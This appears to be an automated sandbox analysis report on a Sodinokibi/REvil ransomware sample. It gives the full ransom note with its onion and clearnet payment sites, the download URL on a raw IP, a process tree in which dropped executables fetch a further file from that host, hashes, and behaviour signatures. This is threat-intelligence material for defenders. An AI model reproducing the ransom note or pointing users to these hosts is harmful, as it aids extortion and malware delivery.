Analysis

  • max time kernel
    110s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    10-12-2021 12:45

General

  • Target

    http://65.52.231.153/order.exe

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\4agrfsh5tx7-HOW-TO-DECRYPT.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 4agrfsh5tx7. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://wwylgcvegp33t2ytnsqa6klroq3kz643q5ceinkqb7x6232g3guit2id.onion 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/913AED0B5FE1497D Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 2ha2V19WEiSs6CxbdB8g61f7VdzmpLnYlkp4gywRY4Pr1vPx6LR989IACch1BXr 344GVX34oPrHBmxGjOCpd3oZlbp1ER4PBMWx7p3aDQmuR2GYOW7n9rN9Qfe4rB0 XUbGzQAJ4UlmNQ3HtVRnsURQT8WgbK9tCaPa0vQHOMCSXFAsWXuiaXIDCKx03dr uV2jxBdR8EJZfR82N8nKDZbSoSLXp8ZNufS7fgMq2GwdQ8mwDSj2QTnU3j4f0Gm Ao5o98BXrv7R7m7BqpZTXYh7b27D5lr0wewyUTmxC42GTBqr6iO0awPlH8NHB7b GEGed0JqXCmRcgaoZMPHXW1ZAPKrWFfwFcvCMgM1w11xyfwFqTx5vzEtMqeNpcT Rh0M9uXc39YUffDkfcFACSjAPYCzfC8MUhkQ8TwUT146XejOJG9vjbQ97z6lsh6 0AMA75wmMpvrLXnnuyxqZDNm3QlTJWLmv5E6LelTWdxFxuFlUMLw41gxwjHrTdd zeJ5QTrbPNeT5QHyIL996KYr3YQJlX493A7loyzSmu6jailgpu8gUegoFcC2Ci0 2TfZ5SfKTVqWLOzRVwtd0ZXoZeSfMw7QE4EP4IqOJkpKoHUaQKrFSE9c50Aa9A7 gYaSRKkWMGfUQtNARJ2PBF18A5lTEHPOJnIvNzDPqye8wtttszsRHu5bhcRVjQR E1RLnlcwcFmiNk3LQM1lPY7HYrqOvhrqagZGfiGIPCQMeMs1oQBJroCp4Kw54OA 4X6IqKwprGtVMIvmM8zkefi9vdtMVwKNBBWyiDBq1lUD7S0hIhk6FogYz7XMajT 45gUKv6DJ7Is3LeBcnMEyMNHXf79lpyQSRZHb8qvLda975mNU55jOffssY7oy7c dI1ZmvXkd7a2UvNKb3toptPCxvqZCBB7OB70FgAc6VblynL7eOfvFSwt3zl0E8h c5dnTyXE42RsTRnNKjt4yfQ25ON6P4JX8y9pU92JHJk2xkdcQlbQUDs6plrElaz At3tfS73Krkwp5YEVvvqoc3C4FDAtRxhrUkJ318KSsQjuRDBRgWT0tKh01yZO7J 33CFVUPKewkX5LTSnCCtN4er7JCTCCi5VjXqrLrqBW2gPWPVgiLWMO68YVIMS6I bOpCVynkcUVr0C7cl3rwd1LtHnZRWDfYFOaSjT3h28sC0gF5b2hSlJokC65sYWO Yy7lmlp2RAJ3fIJ2kid0dgNx5j0QnYKIg Extension name: 4agrfsh5tx7 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://wwylgcvegp33t2ytnsqa6klroq3kz643q5ceinkqb7x6232g3guit2id.onion

http://decryptor.top/913AED0B5FE1497D

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 23 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://65.52.231.153/order.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2608
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2608 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1304
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Users\Admin\AppData\Local\Temp\agent.exe
        "C:\Users\Admin\AppData\Local\Temp\agent.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Sets desktop wallpaper using registry
        • Modifies Control Panel
        • Suspicious use of WriteProcessMemory
        PID:1760
        • C:\Users\Admin\Desktop\net.exe
          "net.exe" http://65.52.231.153/profile.png
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2868
        • C:\Users\Admin\Desktop\net.exe
          "net.exe" http://65.52.231.153/profile.png
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4036
        • C:\Users\Admin\Desktop\net.exe
          "net.exe" http://65.52.231.153/profile.png
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2060
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1120
          4⤵
          • Drops file in Windows directory
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3832
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\4agrfsh5tx7-HOW-TO-DECRYPT.txt
    1⤵
      PID:1980

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\net.exe.log
      MD5

      808e884c00533a9eb0e13e64960d9c3a

      SHA1

      279d05181fc6179a12df1a669ff5d8b64c1380ae

      SHA256

      2f6a0aab99b1c228a6642f44f8992646ce84c5a2b3b9941b6cf1f2badf67bdd6

      SHA512

      9489bdb2ffdfeef3c52edcfe9b34c6688eba53eb86075e0564df1cd474723c86b5b5aedc12df1ff5fc12cf97bd1e3cf9701ff61dc4ce90155d70e9ccfd0fc299

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exe
      MD5

      5b11e8568c32201e9ddb1bdaca1342e5

      SHA1

      bce9d7943d6432a15a728306c9c2b9636ce81ca1

      SHA256

      f9548ec36283b125c1af6f60d8e31a667e5ee59af276e68c9f3f3d4dde4d56b0

      SHA512

      7eab9235edc1370848a46b647566fb740be82fa62888a8d7abe5d37a73e1e09c9f22b5457441d183b398e259661ad976a908af3824bc37dec1e466b87b84eabf

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exe.6wpeg6e.partial
      MD5

      5b11e8568c32201e9ddb1bdaca1342e5

      SHA1

      bce9d7943d6432a15a728306c9c2b9636ce81ca1

      SHA256

      f9548ec36283b125c1af6f60d8e31a667e5ee59af276e68c9f3f3d4dde4d56b0

      SHA512

      7eab9235edc1370848a46b647566fb740be82fa62888a8d7abe5d37a73e1e09c9f22b5457441d183b398e259661ad976a908af3824bc37dec1e466b87b84eabf

    • C:\Users\Admin\AppData\Local\Temp\agent.exe
      MD5

      910c4202c3f973a9d8adc77089d72460

      SHA1

      1fa3c605134cdafbe2c8499c71f8421e1676e966

      SHA256

      abcf40f700b8b0a974fdb9528b058d7606ae3e1b7c080fb0a08108720e8825f9

      SHA512

      fd30c1e491557ffdf24ab8277e7d613d215fce28f4694e07c9d9b22d3aaeed83d12ef72664c139055a3906640469d90bb5d45d904cbff6373713c524f9d24068

    • C:\Users\Admin\AppData\Local\Temp\agent.exe
      MD5

      910c4202c3f973a9d8adc77089d72460

      SHA1

      1fa3c605134cdafbe2c8499c71f8421e1676e966

      SHA256

      abcf40f700b8b0a974fdb9528b058d7606ae3e1b7c080fb0a08108720e8825f9

      SHA512

      fd30c1e491557ffdf24ab8277e7d613d215fce28f4694e07c9d9b22d3aaeed83d12ef72664c139055a3906640469d90bb5d45d904cbff6373713c524f9d24068

    • C:\Users\Admin\Desktop\4agrfsh5tx7-HOW-TO-DECRYPT.txt
      MD5

      637ae544ed099156c54bdd7808e6fa6e

      SHA1

      c32197ff2a28161be705c632b23d6af9ee406ec8

      SHA256

      b7dd502daec43379979dc05746afd3c494fce6d2a558b9eeceaac9c17e16dfc2

      SHA512

      25e5546ace22375265c539f0545b0217438e2d364a03b55de234d034d135964012f7bde81a1dd41725f3f40f2797ff5003da8254cf2ba9369c9f484cbae30dab

    • C:\Users\Admin\Desktop\net.exe
      MD5

      edab8397e652102e581eb1e8d177cc22

      SHA1

      8789114cbe937e3d4f1a90e3380177b0015eeef3

      SHA256

      cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7

      SHA512

      f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d

    • C:\Users\Admin\Desktop\net.exe
      MD5

      edab8397e652102e581eb1e8d177cc22

      SHA1

      8789114cbe937e3d4f1a90e3380177b0015eeef3

      SHA256

      cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7

      SHA512

      f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d

    • C:\Users\Admin\Desktop\net.exe
      MD5

      edab8397e652102e581eb1e8d177cc22

      SHA1

      8789114cbe937e3d4f1a90e3380177b0015eeef3

      SHA256

      cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7

      SHA512

      f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d

    • C:\Users\Admin\Desktop\net.exe
      MD5

      edab8397e652102e581eb1e8d177cc22

      SHA1

      8789114cbe937e3d4f1a90e3380177b0015eeef3

      SHA256

      cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7

      SHA512

      f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d

    • memory/1304-140-0x0000000000000000-mapping.dmp
    • memory/1440-201-0x0000000005410000-0x0000000005411000-memory.dmp
      Filesize

      4KB

    • memory/1440-197-0x0000000000000000-mapping.dmp
    • memory/1760-207-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
      Filesize

      4KB

    • memory/1760-202-0x0000000000000000-mapping.dmp
    • memory/2060-220-0x0000000000000000-mapping.dmp
    • memory/2060-224-0x0000000004CE0000-0x0000000004CE1000-memory.dmp
      Filesize

      4KB

    • memory/2608-134-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-172-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-138-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-136-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-141-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-142-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-144-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-145-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-147-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-149-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-150-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-151-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-155-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-156-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-157-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-163-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-164-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-165-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-166-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-167-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-168-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-137-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-173-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-135-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-115-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-133-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-131-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-129-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-128-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-127-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-124-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-116-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-125-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-123-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-117-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-119-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-122-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-120-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2608-121-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmp
      Filesize

      428KB

    • memory/2868-214-0x0000000004920000-0x0000000004921000-memory.dmp
      Filesize

      4KB

    • memory/2868-209-0x0000000000000000-mapping.dmp
    • memory/4036-219-0x0000000005640000-0x0000000005641000-memory.dmp
      Filesize

      4KB

    • memory/4036-215-0x0000000000000000-mapping.dmp